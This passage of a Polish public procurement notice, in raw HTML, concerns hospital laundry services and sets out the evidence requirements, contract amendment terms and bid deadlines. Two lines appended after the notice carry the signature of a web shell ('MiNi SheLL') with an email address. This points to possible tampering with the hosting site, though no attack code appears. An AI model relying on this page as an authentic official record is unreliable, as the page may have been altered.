zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) opinię wystawioną przez Państwowego - właściwego ze względu na miejsce wykonania usługi<br/>– Inspektora Sanitarnego, że Wykonawca posiada pralnię posiadającą barierę<br/>higieniczną</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków w postępowaniu – zgodnie z Załącznikiem nr 2 do SWZ oraz oświadczenie braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ<br/>UWAGA : Wykonawca jest zobowiązany złożyć ofertę zgodnie z Rozdziałem XIII.<br/>2) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie usługi, co najmniej 1 usługę polegającą na świadczeniu usług pralniczych dla podmiotów leczniczych o wartości brutto min. 250 000,00 zł wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów zgodnie z Załącznikiem nr 6 do SWZ, na rzecz których usługi zostały<br/>wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane (np. zgodnie z zał. nr 7 do SWZ), a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2. Następujące przedmiotowe środki dowodowe, składane wraz z ofertą:1) Karta Techniczna tkaniny potwierdzającej skład chemiczny i gramaturę tkanin, z których<br/>wykonana jest zaoferowana w postępowaniu przetargowym pościel przeznaczona na<br/>wynajem.<br/>2) Zgodnie z art. 107 ust. 2 Pzp, jeżeli Wykonawca nie złożył przedmiotowych środków<br/>dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający<br/>wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3) Dopuszczalne będzie tylko (jednorazowe) uzupełnienie „braków formalnych”, tj. braku<br/>dokumentu lub niekompletnego dokumentu, który nie pozwala przesądzić merytorycznie o<br/>wartości oferty. Tym samym nie będzie dopuszczalne uzupełnianie dokumentów<br/>przedmiotowych, jeśli przedłożone dokumenty potwierdzają, że oferta jest niezgodna z<br/>opisem przedmiotu zamówienia. Oznacza to, że przedmiotowe środki dowodowe nie będą<br/>uzupełniane, jeżeli na skutek merytorycznej oceny zamawiający uzna, że nie odpowiadają<br/>one wymaganiom przedmiotu zamówienia, tj. nie potwierdzają, że wykonawca oferuje<br/>produkt spełniający oczekiwania zamawiającego<br/>4) Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych<br/>środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 9. Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych o których mowa w<br/>art 107 p.z.p. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o<br/>których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane/dostawy/usługi – w zależności od przedmiotu<br/>prowadzonego postępowania - wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają zmiany umowy w zakresie:<br/>1) zmiany cen na korzystniejsze dla Zamawiającego,<br/>2) przedłużenie terminu realizacji umowy o okres do 6 miesięcy, w przypadku nie wyczerpania<br/>w terminie określonym w § 7 niniejszej umowy maksymalnej kwoty zobowiązania, o której<br/>mowa w § 2 ust. 7 niniejszej umowy.<br/>2. W przypadku zmiany umowy z przyczyn wymienionych w ust. 1 strony zawierają aneks w formie<br/>pisemnej pod rygorem nieważności.<br/>3. Strony dopuszczają zmianę umowy w zakresie podatku VAT z mocą obowiązują od wejścia w<br/>życie nowych stawek tego podatku na zasadzie prawa powszechnie obowiązującego przy<br/>zachowaniu niezmiennej ceny netto. Zmiana w tym przypadku nastąpi automatycznie co oznacza,<br/>że nie wymaga formy pisemnego aneksu do umowy.<br/>4. Aneks zostanie sporządzony przez Wykonawcę i przesłany z co najmniej 7 – dniowym<br/>wyprzedzeniem do Zamawiającego w celu zapoznania się z jego treścią i jej zaakceptowania.<br/>5. Postanowienia umowy nie mogą ulec zmianie, chyba że konieczność wprowadzenia takich zmian<br/>wynika z nadzwyczajnych okoliczności, których nie można było przewidzieć w chwili jej<br/>zawarcia.<br/>6. Zmiana umowy jest możliwa tylko w zakresie określonym w ust. 1 i wynikającym z treści art. 455<br/>ustawy prawo zamówień publicznych, tj. w przypadku konieczności dokonania zmian treści<br/>umowy w związku ze zmianą powszechnie obowiązujących przepisów prawa, w zakresie<br/>wyznaczonym przepisami prawa w celu doprowadzenia umowy do stanu zgodnego z przepisami<br/>prawa.<br/>7. W szczególności nie stanowi zmiany umowy w rozumieniu art. 455 ustawy prawo zamówień<br/>publicznych (mogą one zostać dokonane w drodze jednostronnego oświadczenia strony której<br/>danych zmiana dotyczy).<br/>1) danych kontaktowych,<br/>2) elementów formalnych umowy,<br/>3) numeru rachunku bankowego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://paltformazakupowa.pl/pn/szpitalradziejow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-27 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com